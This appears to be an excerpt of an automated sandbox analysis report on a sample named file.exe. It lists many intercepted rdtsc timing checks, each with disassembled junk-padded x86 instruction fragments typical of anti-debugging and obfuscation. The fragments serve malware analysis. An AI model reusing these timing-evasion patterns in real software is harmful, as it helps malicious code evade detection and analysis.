                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81441A second address: 81442C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, esi 0x00000008 xor dx, 62C1h 0x0000000d push eax 0x0000000e push ebx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 814545 second address: 81454F instructions: 0x00000000 rdtsc 0x00000002 jo 00007FECB0CC2D0Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81454F second address: 81455B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81455B second address: 81455F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81455F second address: 81458A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007FECB125BFCCh 0x0000000c popad 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push esi 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 pop edx 0x00000016 pop esi 0x00000017 mov eax, dword ptr [eax] 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FECB125BFCAh 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81458A second address: 8145B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FECB0CC2D0Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FECB0CC2D10h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 814EEB second address: 814EFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007FECB125BFCCh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 814EFB second address: 814EFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84FCE2 second address: 84FCEB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84FCEB second address: 84FCF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84FE51 second address: 84FE55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 850146 second address: 85015A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FECB0CC2D06h 0x0000000a jbe 00007FECB0CC2D06h 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8502AE second address: 8502BB instructions: 0x00000000 rdtsc 0x00000002 jno 00007FECB125BFC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85043A second address: 850441 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 856F70 second address: 856F80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 jnc 00007FECB125BFC6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 855C26 second address: 855C2C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 855DA5 second address: 855DBD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 js 00007FECB125BFC6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FECB125BFCCh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 855DBD second address: 855DC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 855DC3 second address: 855DC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 855DC9 second address: 855DD3 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FECB0CC2D06h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 856652 second address: 85667E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FECB125BFD0h 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FECB125BFD2h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85681E second address: 85682F instructions: 0x00000000 rdtsc 0x00000002 je 00007FECB0CC2D08h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85682F second address: 856833 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85DA9D second address: 85DAA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85FA8D second address: 85FA94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85FA94 second address: 85FAB2 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FECB0CC2D19h 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FECB0CC2D11h 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85FAB2 second address: 85FABE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85FABE second address: 85FAC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85FAC8 second address: 85FAD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007FECB125BFC8h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85FAD5 second address: 85FAE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FECB0CC2D06h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85FAE1 second address: 85FAE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85FAE5 second address: 85FAF0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8625DD second address: 8625E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8625E3 second address: 8625EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8628C6 second address: 8628CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8628CE second address: 8628D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 862A14 second address: 862A18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 862A18 second address: 862A1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 862A1C second address: 862A26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 862A26 second address: 862A36 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FECB0CC2D0Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 862A36 second address: 862A3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 866B5C second address: 866B69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnl 00007FECB0CC2D06h 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 866B69 second address: 866B6E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 866E4E second address: 866E54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 867114 second address: 86711F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007FECB125BFC6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86E60F second address: 86E613 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86E613 second address: 86E623 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnp 00007FECB125BFCCh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81498F second address: 814994 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 814994 second address: 8149AD instructions: 0x00000000 rdtsc 0x00000002 ja 00007FECB125BFC8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 jnc 00007FECB125BFC6h 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8149AD second address: 8149EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007FECB0CC2D0Bh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e movsx ecx, cx 0x00000011 mov ebx, dword ptr [ebp+12485A01h] 0x00000017 add dx, 5900h 0x0000001c add eax, ebx 0x0000001e add di, DBD7h 0x00000023 nop 0x00000024 jmp 00007FECB0CC2D0Dh 0x00000029 push eax 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8149EB second address: 8149EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8149EF second address: 8149F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86E74B second address: 86E74F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86E74F second address: 86E753 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86E753 second address: 86E75F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8724BD second address: 8724DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FECB0CC2D06h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FECB0CC2D10h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8724DE second address: 8724E4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8724E4 second address: 872519 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FECB0CC2D17h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FECB0CC2D11h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 872519 second address: 87253B instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FECB125BFC6h 0x00000008 jl 00007FECB125BFC6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jnl 00007FECB125BFD2h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87253B second address: 872557 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FECB0CC2D0Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FECB0CC2D0Ch 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 871F48 second address: 871F52 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FECB125BFC6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8779FF second address: 877A1D instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FECB0CC2D06h 0x00000008 jmp 00007FECB0CC2D0Ah 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 je 00007FECB0CC2D06h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 877A1D second address: 877A39 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FECB125BFD8h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87822E second address: 878234 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 878539 second address: 87853F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 878AD9 second address: 878B01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007FECB0CC2D06h 0x00000009 jns 00007FECB0CC2D06h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FECB0CC2D12h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 878DE7 second address: 878DF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FECB125BFC6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 878DF3 second address: 878DF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 878DF8 second address: 878E22 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FECB125BFC6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jl 00007FECB125BFCCh 0x00000016 jp 00007FECB125BFC6h 0x0000001c jno 00007FECB125BFCEh 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 882D8F second address: 882DA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FECB0CC2D11h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 882DA5 second address: 882DB0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007FECB125BFC6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 881F55 second address: 881F5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 881F5D second address: 881F8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FECB125BFD7h 0x0000000a pop eax 0x0000000b pushad 0x0000000c jnl 00007FECB125BFCCh 0x00000012 push eax 0x00000013 push edx 0x00000014 jnc 00007FECB125BFC6h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8820EE second address: 8820F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8823C0 second address: 8823C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8826A7 second address: 8826CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FECB0CC2D19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8826CB second address: 8826F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jno 00007FECB125BFDDh 0x0000000b push eax 0x0000000c pop eax 0x0000000d jmp 00007FECB125BFD5h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88A787 second address: 88A798 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a popad 0x0000000b push ecx 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f pop eax 0x00000010 pop ecx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88A798 second address: 88A7A5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 888AE5 second address: 888AEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 888EEE second address: 888EF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 888EF2 second address: 888F06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jbe 00007FECB0CC2D08h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 889837 second address: 889858 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FECB125BFCEh 0x00000007 jl 00007FECB125BFC6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 je 00007FECB125BFC6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 889F76 second address: 889FA1 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FECB0CC2D1Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FECB0CC2D0Dh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8886B0 second address: 8886B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8886B4 second address: 8886BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8886BE second address: 8886C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88D7D8 second address: 88D7DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88D7DE second address: 88D7F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FECB125BFCBh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88D7F7 second address: 88D7FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88D7FB second address: 88D80B instructions: 0x00000000 rdtsc 0x00000002 jo 00007FECB125BFC6h 0x00000008 jp 00007FECB125BFC6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 894CA7 second address: 894CCE instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FECB0CC2D06h 0x00000008 jmp 00007FECB0CC2D15h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f je 00007FECB0CC2D0Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 894612 second address: 894619 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 894619 second address: 894629 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FECB0CC2D06h 0x0000000a popad 0x0000000b pushad 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89478F second address: 894795 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 894795 second address: 8947DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jp 00007FECB0CC2D06h 0x0000000d je 00007FECB0CC2D06h 0x00000013 pop edx 0x00000014 jg 00007FECB0CC2D17h 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FECB0CC2D0Eh 0x00000022 pushad 0x00000023 jc 00007FECB0CC2D06h 0x00000029 pushad 0x0000002a popad 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8947DC second address: 8947E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
